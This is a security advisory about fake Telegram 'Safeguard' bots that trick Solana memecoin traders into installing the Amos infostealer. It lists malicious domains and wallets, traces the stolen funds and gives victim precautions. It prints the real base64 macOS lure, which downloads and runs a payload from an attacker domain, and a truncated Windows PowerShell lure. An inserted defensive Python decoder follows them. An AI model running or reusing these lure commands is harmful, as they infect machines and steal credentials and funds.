
zeroShadow is aware of a widespread and ongoing campaign that involves malicious Safeguard bots on Telegram in order to distribute malware and drain crypto wallets. Interacting with the bot can result in the detonation of malware (an infostealer variant called Amos Stealer) and the draining of the user's crypto wallets.
Safeguard was originally created to verify a user account before they interact with a Telegram or Discord channel - to help admins manage their groups more efficiently and protect them from spammers, scammers, bot attacks, and unwanted behavior. This malicious version preys on people’s belief that they should complete the Safeguard “checks” to gain access to the Telegram channel.
The threat actor(s) behind this campaign are running a professional operation, albeit leveraging malware that operates under a malware-as-a-service (MaaS) model, notably Atomic macOS Stealer (Amos). From a single week of activity in January 2025, zeroShadow traced stolen funds exceeding $1.8M USD that can be attributed to this campaign. The total stolen across all Safeguard scam activity is much higher.
What have we seen?
Through our partners, we have investigated a number of cases involving this Safeguard campaign and can reveal how the exploit occurs.
The Telegram groups responsible for hosting the Safeguard bot are often advertised through social media and other Telegram groups associated with the trading of memecoins on the Solana network.

If a user attempts to join one of these malicious Telegram groups, they are presented with an imitation Safeguard bot and asked to interact with it. The malicious Safeguard bot simply impersonates the branding of the real bot and instructs the user to run a command on their device, which is dependent on their operating system (Windows or macOS).

The commands are obfuscated using base64 encoding, but our analysis of the decoded version shows they:
Download a file to a temporary folder
Remove any quarantine flags to bypass security restrictions
Grant executable permissions to the downloaded file
Execute the malicious file, installing the malware
WARNING - THE FOLLOWING ARE MALICIOUS COMMANDS - DO NOT RUN
On macOS the command is as follows:
echo "Y3VybCAtbyAvdG1wL3VwZGF0ZSBodHRwczovL3JndWVhcHAuY29tL3Z2L3VwZGF0ZSAmJiB4YXR0ciAtYyAvdG1wL3VwZGF0ZSAmJiBjaG1vZCAreCAvdG1wL3VwZGF0ZSAmJiAvdG1wL3VwZGF0ZQ==" | base64 -d | bash &
On Windows the command is as follows:
powershell -w hidden -c $r='0hHduY3N1hTMsxWTvI3dQFzLt92YuIjc0hTNxE2axAnM58yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr')
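As an added defensive example (not code from the zeroShadow write-up), the following Python helper decodes a pasted one-liner of either shape shown above, a base64 blob piped to bash or a reversed string inside a PowerShell command, and flags the download-to-temp, quarantine-strip, chmod and execute stages. The sample commands are constructed with a placeholder host and are not the real lure strings.

```python
import base64
import re
# Stages of the decoded macOS one-liner described above: fetch to a temp path,
# strip the quarantine attribute, mark executable, run it.
MACOS_STAGES = {
    "download_to_tmp": re.compile(r"\bcurl\b[^&|;]*\s-o\s+/tmp/"),
    "quarantine_removed": re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"),
    "made_executable": re.compile(r"\bchmod\s+\+x\s+/tmp/"),
    "executed_from_tmp": re.compile(r"(&&|;)\s*/tmp/\S+\s*$"),
}
PIPE_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode)\s*\|\s*(ba|z)?sh\b")  # on the raw command
PS_REVERSE = re.compile(r"\[-1\.\.-\(\$\w+\.Length\)\]")  # PowerShell string-reversal idiom
B64_BLOB = re.compile(r"[A-Za-z0-9+/=]{24,}")

def _try_b64(s):
    """Decode s as base64 to printable UTF-8 text, tolerating stripped or misplaced padding."""
    s = s.strip("=")
    try:
        text = base64.b64decode(s + "=" * (-len(s) % 4), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def decode_payloads(cmd):
    """Recover hidden text from a lure command, trying each blob as-is and reversed."""
    found = []
    for blob in B64_BLOB.findall(cmd):
        for variant in (blob, blob[::-1]):
            text = _try_b64(variant)
            if text and text not in found:
                found.append(text)
    return found

def analyse(cmd):
    """Return decoded payloads, matched stages and a verdict for one pasted command."""
    payloads = decode_payloads(cmd)
    stages = {n: any(rx.search(p) for p in payloads) for n, rx in MACOS_STAGES.items()}
    stages["piped_to_shell"] = bool(PIPE_TO_SHELL.search(cmd))
    stages["reversed_string"] = bool(PS_REVERSE.search(cmd))
    if sum(stages.values()) >= 3 or (stages["reversed_string"] and payloads):
        verdict = "malicious"
    else:
        verdict = "suspicious" if payloads else "clean"
    return {"payloads": payloads, "stages": stages, "verdict": verdict}

# Constructed samples with the shape of the lure commands (placeholder host, not the real one).
MAC_PAYLOAD = "curl -o /tmp/update https://example.invalid/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update"
SAMPLE_MACOS = f'echo "{base64.b64encode(MAC_PAYLOAD.encode()).decode()}" | base64 -d | bash &'
WIN_REVERSED = base64.b64encode(b"https://example.invalid/update.exe").decode()[::-1]
SAMPLE_WINDOWS = f"powershell -w hidden -c $r='{WIN_REVERSED}';$u=($r[-1..-($r.Length)]-join '');&($u|%{{&('iwr')"
```

Run analyse() over any command a user is asked to paste; a "malicious" verdict with the quarantine and execute stages set is the signature of this lure.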
The malware that is installed is an infostealer variant called Atomic macOS stealer (Amos stealer), which is capable of extracting the following:
System information
Keychain data
Saved passwords
Cookies
Autofill information including payment card data
Crypto wallet data and wallet files that can be used to hijack and drain those wallets
Application data (including for Telegram)
This ultimately allows the threat actor to compromise the user's wallets, draining all the tokens. The threat actor could also leverage the other stolen data to further compromise the victim, although this has not been the case with the victims we are aware of.
Due to the techniques used, the user would be entirely unaware of the execution and detonation of these payloads, and the payloads are designed to bypass Windows User Account Control (UAC), meaning the user would receive no warnings.
Analysis of the malware by zeroShadow is ongoing, but we can confidently say any impacted user would be infected with some form of Remote Access Trojan (RAT) or infostealer, which would result in the loss of their credentials, the compromise of their crypto wallets and the subsequent loss of tokens.
Some of the malicious domains we have identified are:
hxxps://x[.]com/koIlwaii
t[.]me/kolwaiihq
hxxps://rgueapp[.]com
hxxps://92p1ka158tr2p[.]com
hxxps://clearguide[.]cyou
Tracing the funds
This threat actor is primarily targeting traders of memecoins on the Solana blockchain. Unfortunately, this community is most vulnerable to this type of exploitation due to the nature of memecoins and the way they are advertised across social media.
In the first week of tracing these funds in January 2025, the primary threat-actor-controlled wallets receiving stolen funds were as follows:
3ksZvaFjTVdZKz9VJRtq1CGwP7xidNPWKyt5JFg5V5Ec which has received 3,090 SOL
GYARMZefSErvLZfHUFjhd7goZq7YBYDWdZKV24xvTab4 which has received 1,822.89 SOL
C2DuY9SmkGcxVQNnUwPMAiNbe1fbA7roRJ24cPsKvbLp which has received 152.71 SOL
This SOL has an approximate value of $1.2M USD, and these addresses have also received other tokens with values exceeding $600K USD.
The threat actor has made use of the bridging service Wormhole to swap SOL for ETH on the Ethereum blockchain, and has made further swaps to Monero through eXch and other instant exchangers. They have also used the privacy protocol Railgun as a mixer.

What can you do?
There are many precautions you can take to prevent yourself from being a victim of this scam. These include:
Do not interact with unknown Telegram groups and bots.
Never launch commands without fully understanding their function, no matter how benign they seem.
Use a standalone password manager which features vault encryption.
Use a firewall, such as LuLu, that blocks new traffic by default to prevent malware command and control.
Use crypto wallets that feature multisig transaction signing, or require a hardware device.
Store the bulk of your funds on a cold wallet, which is not associated with your main device.
Engage the services of a Web3 focused security company like zeroShadow.
Should you come across a Telegram group which demands interaction with a Safeguard style bot, act immediately to:
Exit the group without any interaction with the bot.
Do not run any commands.
Inform your security team.
Provide details to zeroShadow and SEAL 911 as soon as possible.
If you accidentally interact with the bot and detonate the malware:
Immediately isolate the device from the web.
Urgently secure your crypto tokens into a new safe wallet.
Change your passwords, enabling multi-factor authentication whenever possible.
Work with your security team to resolve any infection. Get in touch with zeroShadow.
Original article by the zeroShadow team